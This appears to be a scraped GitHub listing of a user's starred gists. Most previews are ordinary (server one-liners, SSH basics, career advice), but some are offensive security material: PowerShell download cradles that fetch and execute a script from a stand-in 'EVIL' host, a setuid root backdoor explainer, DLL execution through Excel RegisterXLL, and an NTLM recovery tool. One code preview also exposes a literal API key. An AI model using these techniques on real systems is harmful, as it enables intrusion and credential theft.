Franci Šacer fsacer

@willurd
willurd / web-servers.md
Last active April 25, 2024 01:54
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000
@dergachev
dergachev / setuid-root-backdoor.md
Last active March 16, 2024 00:49
How to use setuid to install a root backdoor.

Why You Can't Un-Root a Compromised Machine

Let's say somebody temporarily got root access to your system, whether because you "temporarily" gave them sudo rights, they guessed your password, or any other way. Even if you can disable their original method of accessing root, there's an infinite number of dirty tricks they can use to easily get it back in the future.

While the obvious tricks are easy to spot, like adding an entry to /root/.ssh/authorized_keys, or creating a new user, potentially via running malware, or via a cron job, I recently came across a rather subtle one that doesn't require changing any code, but instead exploits a standard feature of the Linux user permissions system called setuid to subtly allow them to execute a root shell from any user account on the system (including www-data, which you might not even know is compromised).

If the "setuid bit" (or flag, or permission mode) is set for an executable, the operating system will run not as the cur

@learncodeacademy
learncodeacademy / gist:5850f394342a5bfdbfa4
Last active January 7, 2024 11:58
SSH Basics - Getting started with Linux Server Administration

###SSH into a remote machine###

ssh user@mydomain.com
#or by ip address
ssh user@192.168.1.1

exit: exit

###Install Something###

#If it's a new server, update apt-get first thing
@HarmJ0y
HarmJ0y / DownloadCradles.ps1
Last active April 14, 2024 23:56
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@AaronRM
AaronRM / facebook-mass-delete-group-members.js
Last active March 23, 2018 14:51 — forked from michaelv/facebook-mass-delete-group-members.js
This JavaScript removes all users from a Facebook group. It works with the new Facebook layout. Paste this in the JavaScript console. Script tested in Firefox. Known issues: 1. when Facebook responds slowly, the script might experience hiccups. 2. occasionally, the error 'this user is not a member of the group' pops up. IMPORTANT: add your ow…
var deleteAllGroupMembers = (function () {
var deleteAllGroupMembers = {};
// the facebook ids of the users that will not be removed.
// IMPORTANT: add your own facebook id here so that the script will not remove yourself!
var excludedFbIds = ['1234','11223344']; // make sure each id is a string!
var usersToDeleteQueue = [];
var scriptEnabled = false;
var processing = false;
deleteAllGroupMembers.start = function() {
@mpj
mpj / monad-stream-example.js
Last active September 14, 2022 06:42
This is the code from Monads - episode #21 of FunFunFunction (https://www.youtube.com/playlist?list=PL0zVEGEvSaeFSwPn06GKArptSxiP1Gff8)
const fetch = require('node-fetch')
const Bacon = require('baconjs')
function getInPortuguese(word) {
// Google Translate API is a paid (but dirt cheap) service. This is my key
// and will be disabled by the time the video is out. To generate your own,
// go here: https://cloud.google.com/translate/v2/getting_started
const apiKey =
'AIzaSyB4DyRHIsNhogQXmH16YKbZfR-lTXrQpq0'
const url =
@coldfusion39
coldfusion39 / deskey_to_ntlm.py
Last active April 17, 2019 13:45
Retrieve the NTLM from a captured NetNTLMv1 session
#!/usr/bin/env python
# Copyright (c) 2017, Brandan Geise [coldfusion]
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
@mubix
mubix / infosec_newbie.md
Last active April 7, 2024 22:35
How to start in Infosec
void Main()
{
//testGenerating();
var grid = goodGrid();
//grid.Write().Dump();
grid.MakeGame();
//grid.Write().Dump();
var foundOne = false;
var game = grid.Write();
while(!foundOne)
@ryhanson
ryhanson / ExcelXLL.md
Last active March 29, 2024 05:27
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc